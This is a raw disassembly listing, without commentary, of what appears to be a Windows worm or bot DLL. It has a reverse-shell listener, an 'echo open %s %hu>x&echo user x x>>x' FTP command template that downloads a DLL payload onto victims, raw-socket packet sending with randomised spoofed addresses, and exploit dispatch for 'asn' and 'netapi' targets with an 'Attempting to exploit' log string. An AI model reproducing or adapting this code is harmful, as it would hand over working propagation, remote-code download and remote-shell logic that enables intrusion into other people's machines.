; Attributes: bp-based frame
; void __cdecl sub_10009AD1()
sub_10009AD1 proc near ; DATA XREF: sub_10009ABF+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D13F
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10009AD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009AE1 proc near ; DATA XREF: .data:1000E058�o
push ebp
mov ebp, esp
call sub_10009AF0
call sub_10009B00
pop ebp
retn
sub_10009AE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009AF0 proc near ; CODE XREF: sub_10009AE1+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D13E
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10009AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009B00 proc near ; CODE XREF: sub_10009AE1+8�p
push ebp
mov ebp, esp
push offset sub_10009B12 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10009B00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10009B12()
sub_10009B12 proc near ; DATA XREF: sub_10009B00+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D13E
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10009B12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10009B22(char *Src)
sub_10009B22 proc near ; CODE XREF: sub_10009B22+F6�p
; sub_10009EF0+276�p
cp = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_4], 0FFFFFFFFh
mov [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_10], 0FFFFFFFFh
lea eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_C]
push ecx
lea edx, [ebp+var_8]
push edx
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D_5 ; "%d.%d.%d.%d"
mov ecx, [ebp+Src]
push ecx ; Src
call ds:sscanf ; sscanf
add esp, 18h
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_10009B7E
push 0FFh
push 0
call sub_10004608
add esp, 8
mov [ebp+var_4], eax
loc_10009B7E: ; CODE XREF: sub_10009B22+48�j
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_10009B96
push 0FFh
push 0
call sub_10004608
add esp, 8
mov [ebp+var_8], eax
loc_10009B96: ; CODE XREF: sub_10009B22+60�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_10009BAE
push 0FFh
push 0
call sub_10004608
add esp, 8
mov [ebp+var_C], eax
loc_10009BAE: ; CODE XREF: sub_10009B22+78�j
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_10009BC6
push 0FFh
push 0
call sub_10004608
add esp, 8
mov [ebp+var_10], eax
loc_10009BC6: ; CODE XREF: sub_10009B22+90�j
mov edx, [ebp+var_10]
push edx
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_4]
push edx
push offset aD_D_D_D_6 ; "%d.%d.%d.%d"
push 10h ; Count
lea eax, [ebp+cp]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
push offset Dest ; Str2
lea ecx, [ebp+cp]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jz short loc_10009C14
push offset byte_1002C5D8 ; Str2
lea edx, [ebp+cp]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10009C22
loc_10009C14: ; CODE XREF: sub_10009B22+DB�j
mov eax, [ebp+Src]
push eax ; Src
call sub_10009B22
add esp, 4
jmp short loc_10009C2C
; ---------------------------------------------------------------------------
loc_10009C22: ; CODE XREF: sub_10009B22+F0�j
lea ecx, [ebp+cp]
push ecx ; cp
call ds:inet_addr ; inet_addr
loc_10009C2C: ; CODE XREF: sub_10009B22+FE�j
mov esp, ebp
pop ebp
retn
sub_10009B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009C30 proc near ; CODE XREF: sub_10009EF0+49�p
DstBuf = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 14h
push offset aFtpd ; "ftpd"
call sub_1000A7E9
add esp, 4
test eax, eax
jnz loc_10009CE5
push 0EA60h
push 7D0h
call sub_10004608
add esp, 8
mov word ptr [ebp+var_8], ax
mov byte ptr [ebp+var_8+2], 0
push 0Ah ; Radix
lea eax, [ebp+DstBuf]
push eax ; DstBuf
mov ecx, [ebp+var_8]
and ecx, 0FFFFh
push ecx ; Val
call ds:_itoa ; _itoa
add esp, 0Ch
push eax ; int
push offset aFtpd_0 ; "ftpd"
call sub_1000A752
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_10009C99
xor al, al
jmp short loc_10009CE7
; ---------------------------------------------------------------------------
loc_10009C99: ; CODE XREF: sub_10009C30+63�j
lea edx, [ebp+var_C]
push edx
push offset sub_10005C3D
call sub_10004C65
add esp, 8
mov ecx, [ebp+var_C]
imul ecx, 0CCh
mov dword_10012EA0[ecx], eax
mov edx, [ebp+var_C]
imul edx, 0CCh
cmp dword_10012EA0[edx], 0
jnz short loc_10009CCF
xor al, al
jmp short loc_10009CE7
; ---------------------------------------------------------------------------
loc_10009CCF: ; CODE XREF: sub_10009C30+99�j
; sub_10009C30+B3�j
mov eax, [ebp+var_8+2]
and eax, 0FFh
test eax, eax
jnz short loc_10009CE5
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10009CCF
; ---------------------------------------------------------------------------
loc_10009CE5: ; CODE XREF: sub_10009C30+15�j
; sub_10009C30+A9�j
mov al, 1
loc_10009CE7: ; CODE XREF: sub_10009C30+67�j
; sub_10009C30+9D�j
mov esp, ebp
pop ebp
retn
sub_10009C30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10009CEB(int,u_short hostshort)
sub_10009CEB proc near ; CODE XREF: sub_10003D60+3CE�p
Dest = byte ptr -1424h
s = dword ptr -1414h
buf = byte ptr -1410h
Str = byte ptr -410h
name = sockaddr ptr -10h
arg_0 = dword ptr 8
hostshort = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1424h
call __alloca_probe
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_10009D1A
xor al, al
jmp loc_10009E2C
; ---------------------------------------------------------------------------
loc_10009D1A: ; CODE XREF: sub_10009CEB+26�j
mov [ebp+name.sa_family], 2
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
mov ecx, [ebp+arg_0]
mov dword ptr [ebp+name.sa_data+2], ecx
push 8 ; Size
push 0 ; Val
lea edx, [ebp+name.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
mov ecx, [ebp+s]
push ecx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_10009D71
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
xor al, al
jmp loc_10009E2C
; ---------------------------------------------------------------------------
loc_10009D71: ; CODE XREF: sub_10009CEB+70�j
push 0 ; flags
push 1000h ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
test eax, eax
jg short loc_10009DA4
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
xor al, al
jmp loc_10009E2C
; ---------------------------------------------------------------------------
loc_10009DA4: ; CODE XREF: sub_10009CEB+A3�j
call sub_10006FA2
push eax
push offset aS_dll_7 ; "%s.dll"
push 10h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea ecx, [ebp+Dest]
push ecx
lea edx, [ebp+Dest]
push edx
xor eax, eax
mov ax, hostshort
push eax
push offset Dest
push offset aEchoOpenSHuXEc ; "echo open %s %hu>x&echo user x x>>x&ech"...
push 400h ; Count
lea ecx, [ebp+Str]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
push 0 ; flags
lea edx, [ebp+Str]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+Str]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov al, 1
loc_10009E2C: ; CODE XREF: sub_10009CEB+2A�j
; sub_10009CEB+81�j ...
mov esp, ebp
pop ebp
retn
sub_10009CEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009E30 proc near ; CODE XREF: sub_10009EF0+27F�p
s = dword ptr -48h
optval = byte ptr -44h
var_40 = dword ptr -40h
to = sockaddr ptr -3Ch
var_2C = dword ptr -2Ch
buf = byte ptr -28h
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 48h
mov dword ptr [ebp+optval], 1
mov [ebp+var_40], 10h
push offset Dest ; cp
call ds:inet_addr ; inet_addr
mov [ebp+var_2C], eax
push 0 ; protocol
push 3 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_10009E6C
jmp loc_10009EEC
; ---------------------------------------------------------------------------
loc_10009E6C: ; CODE XREF: sub_10009E30+35�j
push 4 ; optlen
lea eax, [ebp+optval]
push eax ; optval
push 2 ; optname
push 0 ; level
mov ecx, [ebp+s]
push ecx ; s
call ds:setsockopt ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_10009E87
jmp short loc_10009EEC
; ---------------------------------------------------------------------------
loc_10009E87: ; CODE XREF: sub_10009E30+53�j
mov [ebp+to.sa_family], 2
mov word ptr [ebp+to.sa_data], 0
mov edx, [ebp+arg_0]
mov dword ptr [ebp+to.sa_data+2], edx
push 8 ; Size
push 0 ; Val
lea eax, [ebp+to.sa_data+6]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov cx, [ebp+arg_4]
push ecx ; __int16
mov dx, word_1002D13C
push edx ; hostshort
mov eax, [ebp+arg_0]
push eax ; int
mov ecx, [ebp+var_2C]
push ecx ; int
lea edx, [ebp+buf]
push edx ; int
call sub_10006D53
add esp, 14h
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 28h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
loc_10009EEC: ; CODE XREF: sub_10009E30+37�j
; sub_10009E30+55�j
mov esp, ebp
pop ebp
retn
sub_10009E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009EF0 proc near ; DATA XREF: sub_10007424+20CE�o
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
DstBuf = byte ptr -7Ch
hObject = dword ptr -74h
var_70 = word ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
dwMilliseconds = dword ptr -64h
var_60 = word ptr -60h
var_5E = dword ptr -5Eh
Str2 = byte ptr -5Ah
Src = byte ptr -1Ah
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
push edi
mov esi, [ebp+arg_0]
mov ecx, 1Ah
lea edi, [ebp+var_68]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_6C], eax
mov ecx, [ebp+var_6C]
mov byte ptr [ecx+5Fh], 1
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
mov dx, [ebp+var_60]
mov [ebp+var_70], dx
movsx eax, [ebp+Str2]
test eax, eax
jz loc_1000A06A
call sub_10009C30
and eax, 0FFh
test eax, eax
jnz short loc_10009F60
push 1
mov ecx, [ebp+var_68]
push ecx
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_10009F60: ; CODE XREF: sub_10009EF0+55�j
lea edx, [ebp+Str2]
push edx ; Str2
push offset aMsdtc ; "msdtc"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_1000A06A
push offset aRshell ; "rshell"
call sub_1000A7E9
add esp, 4
test eax, eax
jnz loc_1000A06A
push 0EA60h
push 7D0h
call sub_10004608
add esp, 8
mov Val, ax
mov byte ptr [ebp+var_80], 0
push 0Ah ; Radix
lea eax, [ebp+DstBuf]
push eax ; DstBuf
xor ecx, ecx
mov cx, Val
push ecx ; Val
call ds:_itoa ; _itoa
add esp, 0Ch
push eax ; int
push offset aRshell_0 ; "rshell"
call sub_1000A752
add esp, 8
mov [ebp+var_84], eax
cmp [ebp+var_84], 0FFFFFFFFh
jnz short loc_10009FFC
push 1
mov edx, [ebp+var_84]
push edx
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_10009FFC: ; CODE XREF: sub_10009EF0+EE�j
lea eax, [ebp+var_84]
push eax
push offset sub_1000A50C
call sub_10004C65
add esp, 8
mov ecx, [ebp+var_84]
imul ecx, 0CCh
mov dword_10012EA0[ecx], eax
mov edx, [ebp+var_84]
imul edx, 0CCh
cmp dword_10012EA0[edx], 0
jnz short loc_1000A053
push 1
mov eax, [ebp+var_84]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A053: ; CODE XREF: sub_10009EF0+145�j
; sub_10009EF0+178�j
mov ecx, [ebp+var_80]
and ecx, 0FFh
test ecx, ecx
jnz short loc_1000A06A
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_1000A053
; ---------------------------------------------------------------------------
loc_1000A06A: ; CODE XREF: sub_10009EF0+43�j
; sub_10009EF0+83�j ...
push 0EA60h
push 7D0h
call sub_10004608
add esp, 8
mov word_1002D13C, ax
mov byte ptr [ebp+var_8], 0
lea edx, [ebp+var_68]
push edx
push offset sub_1000A1A9
call sub_10004C65
add esp, 8
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jnz short loc_1000A0AB
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A0AB: ; CODE XREF: sub_10009EF0+1AE�j
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000A0B5: ; CODE XREF: sub_10009EF0+1DA�j
mov ecx, [ebp+var_8]
and ecx, 0FFh
test ecx, ecx
jnz short loc_1000A0CC
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_1000A0B5
; ---------------------------------------------------------------------------
loc_1000A0CC: ; CODE XREF: sub_10009EF0+1D0�j
; sub_10009EF0+291�j
mov edx, 1
test edx, edx
jz loc_1000A186
mov eax, [ebp+var_5E]
and eax, 0FFFFh
test eax, eax
jz short loc_1000A15D
mov ecx, [ebp+var_5E+2]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_1000A106
push 2
push 0
call sub_10004608
add esp, 8
mov [ebp+var_88], eax
jmp short loc_1000A118
; ---------------------------------------------------------------------------
loc_1000A106: ; CODE XREF: sub_10009EF0+200�j
push 2
push 0
call sub_10004608
add esp, 8
mov [ebp+var_88], eax
loc_1000A118: ; CODE XREF: sub_10009EF0+214�j
mov edx, [ebp+var_88]
mov [ebp+var_8C], edx
cmp [ebp+var_8C], 0
jz short loc_1000A141
cmp [ebp+var_8C], 1
jz short loc_1000A14B
cmp [ebp+var_8C], 2
jz short loc_1000A155
jmp short loc_1000A15D
; ---------------------------------------------------------------------------
loc_1000A141: ; CODE XREF: sub_10009EF0+23B�j
mov ax, [ebp+var_60]
mov [ebp+var_70], ax
jmp short loc_1000A15D
; ---------------------------------------------------------------------------
loc_1000A14B: ; CODE XREF: sub_10009EF0+244�j
mov cx, word ptr [ebp+var_5E]
mov [ebp+var_70], cx
jmp short loc_1000A15D
; ---------------------------------------------------------------------------
loc_1000A155: ; CODE XREF: sub_10009EF0+24D�j
mov dx, word ptr [ebp+var_5E+2]
mov [ebp+var_70], dx
loc_1000A15D: ; CODE XREF: sub_10009EF0+1F3�j
; sub_10009EF0+24F�j ...
mov ax, [ebp+var_70]
push eax
lea ecx, [ebp+Src]
push ecx ; Src
call sub_10009B22
add esp, 4
push eax
call sub_10009E30
add esp, 8
mov edx, [ebp+dwMilliseconds]
push edx ; dwMilliseconds
call ds:Sleep ; Sleep
jmp loc_1000A0CC
; ---------------------------------------------------------------------------
loc_1000A186: ; CODE XREF: sub_10009EF0+1E3�j
push 1
mov eax, [ebp+var_68]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_10009EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A1A9 proc near ; DATA XREF: sub_10009EF0+19A�o
var_100A0 = word ptr -100A0h
var_1009C = dword ptr -1009Ch
var_10098 = dword ptr -10098h
argp = dword ptr -10094h
s = dword ptr -10090h
hObject = dword ptr -1008Ch
var_10088 = dword ptr -10088h
in = in_addr ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = byte ptr -1007Ch
var_10074 = dword ptr -10074h
Str1 = byte ptr -10070h
buf = byte ptr -10014h
var_10000 = byte ptr -10000h
name = sockaddr ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 100A0h
call __alloca_probe
push esi
push edi
mov [ebp+argp], 1
mov esi, [ebp+arg_0]
mov ecx, 1Ah
lea edi, [ebp+var_1007C]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_10080], eax
mov ecx, [ebp+var_10080]
mov byte ptr [ecx+60h], 1
push 0 ; protocol
push 3 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_1000A20B
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A20B: ; CODE XREF: sub_1000A1A9+55�j
mov [ebp+name.sa_family], 2
mov word ptr [ebp+name.sa_data], 0
push offset Dest ; cp
call ds:inet_addr ; inet_addr
mov dword ptr [ebp+name.sa_data+2], eax
push 8 ; Size
push 0 ; Val
lea edx, [ebp+name.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
mov ecx, [ebp+s]
push ecx ; s
call ds:bind ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_1000A265
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A265: ; CODE XREF: sub_1000A1A9+A2�j
lea eax, [ebp+argp]
push eax ; argp
push 98000001h ; cmd
mov ecx, [ebp+s]
push ecx ; s
call ds:ioctlsocket ; ioctlsocket
cmp eax, 0FFFFFFFFh
jnz short loc_1000A29B
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A29B: ; CODE XREF: sub_1000A1A9+D8�j
; sub_1000A1A9+14E�j ...
xor eax, eax
mov al, byte_1002D0F6
test eax, eax
jz loc_1000A4EA
push 0 ; flags
push 0FFFFh ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
test eax, eax
jg short loc_1000A2E1
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A2E1: ; CODE XREF: sub_1000A1A9+11E�j
lea ecx, [ebp+buf]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx+9]
cmp eax, 6
jz short loc_1000A2F9
jmp short loc_1000A29B
; ---------------------------------------------------------------------------
loc_1000A2F9: ; CODE XREF: sub_1000A1A9+14C�j
lea ecx, [ebp+var_10000]
mov [ebp+var_10088], ecx
mov edx, [ebp+var_10088]
xor eax, eax
mov al, [edx+0Dh]
cmp eax, 12h
jnz loc_1000A4E5
mov ecx, [ebp+var_10088]
mov dx, [ecx+2]
push edx ; netshort
call ds:ntohs ; ntohs
and eax, 0FFFFh
xor ecx, ecx
mov cx, word_1002D13C
cmp eax, ecx
jnz loc_1000A4E5
mov edx, [ebp+var_10088]
mov ax, [edx]
push eax ; netshort
call ds:ntohs ; ntohs
and eax, 0FFFFh
mov ecx, [ebp+var_10074]
and ecx, 0FFFFh
cmp eax, ecx
jz short loc_1000A3B3
mov edx, [ebp+var_10088]
mov ax, [edx]
push eax ; netshort
call ds:ntohs ; ntohs
and eax, 0FFFFh
mov ecx, [ebp+var_10074+2]
and ecx, 0FFFFh
cmp eax, ecx
jz short loc_1000A3B3
mov edx, [ebp+var_10088]
mov ax, [edx]
push eax ; netshort
call ds:ntohs ; ntohs
and eax, 0FFFFh
mov ecx, dword ptr [ebp+Str1]
and ecx, 0FFFFh
cmp eax, ecx
jnz loc_1000A4E5
loc_1000A3B3: ; CODE XREF: sub_1000A1A9+1BA�j
; sub_1000A1A9+1DF�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
mov dword ptr [ebp+in.S_un], eax
movsx ecx, [ebp+Str1+2]
test ecx, ecx
jz loc_1000A4AF
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
mov [ebp+var_1009C], eax
mov ecx, [ebp+var_10088]
mov dx, [ecx]
push edx ; netshort
call ds:ntohs ; ntohs
mov [ebp+var_100A0], ax
mov byte ptr [ebp+var_10098], 0
push offset aAsn_1 ; "asn"
lea eax, [ebp+Str1+2]
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000A447
lea ecx, [ebp+var_100A0]
push ecx
push offset sub_10001EBF
call sub_10004C65
add esp, 8
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jnz short loc_1000A438
jmp loc_1000A29B
; ---------------------------------------------------------------------------
loc_1000A438: ; CODE XREF: sub_1000A1A9+288�j
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_1000A494
; ---------------------------------------------------------------------------
loc_1000A447: ; CODE XREF: sub_1000A1A9+265�j
push offset aNetapi_1 ; "netapi"
lea eax, [ebp+Str1+2]
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000A494
lea ecx, [ebp+var_100A0]
push ecx
push offset sub_10003D60
call sub_10004C65
add esp, 8
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jnz short loc_1000A487
jmp loc_1000A29B
; ---------------------------------------------------------------------------
loc_1000A487: ; CODE XREF: sub_1000A1A9+2D7�j
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000A494: ; CODE XREF: sub_1000A1A9+29C�j
; sub_1000A1A9+2B4�j ...
mov eax, [ebp+var_10098]
and eax, 0FFh
test eax, eax
jnz short loc_1000A4AD
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_1000A494
; ---------------------------------------------------------------------------
loc_1000A4AD: ; CODE XREF: sub_1000A1A9+2F8�j
jmp short loc_1000A4E5
; ---------------------------------------------------------------------------
loc_1000A4AF: ; CODE XREF: sub_1000A1A9+21F�j
mov ecx, dword ptr [ebp+in.S_un]
push ecx ; in
call ds:inet_ntoa ; inet_ntoa
push eax
mov edx, [ebp+var_10088]
mov ax, [edx]
push eax ; netshort
call ds:ntohs ; ntohs
and eax, 0FFFFh
push eax ; char
push offset aHuAttemptingTo ; "%hu | Attempting to exploit %s"
push offset dword_1002C7E8 ; int
call sub_10007303
add esp, 10h
loc_1000A4E5: ; CODE XREF: sub_1000A1A9+16A�j
; sub_1000A1A9+191�j ...
jmp loc_1000A29B
; ---------------------------------------------------------------------------
loc_1000A4EA: ; CODE XREF: sub_1000A1A9+FB�j
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_1000A1A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A50C proc near ; DATA XREF: sub_10009EF0+113�o
Dest = byte ptr -44Ch
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
s = dword ptr -434h
var_430 = dword ptr -430h
addr = sockaddr ptr -42Ch
in = in_addr ptr -41Ch
addrlen = dword ptr -418h
buf = byte ptr -414h
var_14 = dword ptr -14h
name = sockaddr ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 44Ch
mov [ebp+addrlen], 10h
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov edx, [eax+4]
mov [ebp+var_43C], ecx
mov [ebp+var_438], edx
mov eax, [ebp+arg_0]
mov [ebp+var_430], eax
mov ecx, [ebp+var_430]
mov byte ptr [ecx+4], 1
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_1000A57D
push 1
mov edx, [ebp+var_43C]
push edx
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000A57D: ; CODE XREF: sub_1000A50C+53�j
mov [ebp+name.sa_family], 2
mov ax, Val
push eax ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], 0
push 8 ; Size
push 0 ; Val
lea ecx, [ebp+name.sa_data+6]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
loc_1000A5AB: ; CODE XREF: sub_1000A50C+C2�j
push 10h ; namelen
lea edx, [ebp+name]
push edx ; name
mov eax, [ebp+s]
push eax ; s
call ds:bind ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_1000A5D0
push 1388h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_1000A5AB
; ---------------------------------------------------------------------------
loc_1000A5D0: ; CODE XREF: sub_1000A50C+B5�j
push 0Ah ; backlog
mov ecx, [ebp+s]
push ecx ; s
call ds:listen ; listen
loc_1000A5DF: ; CODE XREF: sub_1000A50C+104�j
; sub_1000A50C+1B3�j
mov edx, 1
test edx, edx
jz loc_1000A6C4
lea eax, [ebp+addrlen]
push eax ; addrlen
lea ecx, [ebp+addr]
push ecx ; addr
mov edx, [ebp+s]
push edx ; s
call ds:accept ; accept
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_1000A612
jmp short loc_1000A5DF
; ---------------------------------------------------------------------------
loc_1000A612: ; CODE XREF: sub_1000A50C+102�j
mov eax, dword ptr [ebp+addr.sa_data+2]
mov dword ptr [ebp+in.S_un], eax
mov ecx, dword ptr [ebp+in.S_un]
push ecx ; in
call ds:inet_ntoa ; inet_ntoa
push eax ; char
push offset aGotReverseShel ; "[+] Got reverse shell connection from %"...
push offset dword_1002C7E8 ; int
call sub_10007303
add esp, 0Ch
call sub_10006FA2
push eax
push offset aS_dll_8 ; "%s.dll"
push 10h ; Count
lea edx, [ebp+Dest]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea ecx, [ebp+Dest]
push ecx
xor edx, edx
mov dx, hostshort
push edx
push offset Dest
push offset aEchoOpenSHuX_0 ; "echo open %s %hu>x&echo user x x>>x&ech"...
push 400h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+var_14]
push eax ; s
call ds:send ; send
mov ecx, [ebp+var_14]
push ecx ; s
call ds:closesocket ; closesocket
jmp loc_1000A5DF
; ---------------------------------------------------------------------------
loc_1000A6C4: ; CODE XREF: sub_1000A50C+DA�j
mov esp, ebp
pop ebp
retn 4
sub_1000A50C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A6D0 proc near ; DATA XREF: .data:1000E05C�o
push ebp
mov ebp, esp
call sub_1000A6DF
call sub_1000A6EF
pop ebp
retn
sub_1000A6D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A6DF proc near ; CODE XREF: sub_1000A6D0+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D149
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_1000A6DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A6EF proc near ; CODE XREF: sub_1000A6D0+8�p
push ebp
mov ebp, esp
push offset sub_1000A701 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000A6EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000A701()
sub_1000A701 proc near ; DATA XREF: sub_1000A6EF+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D149
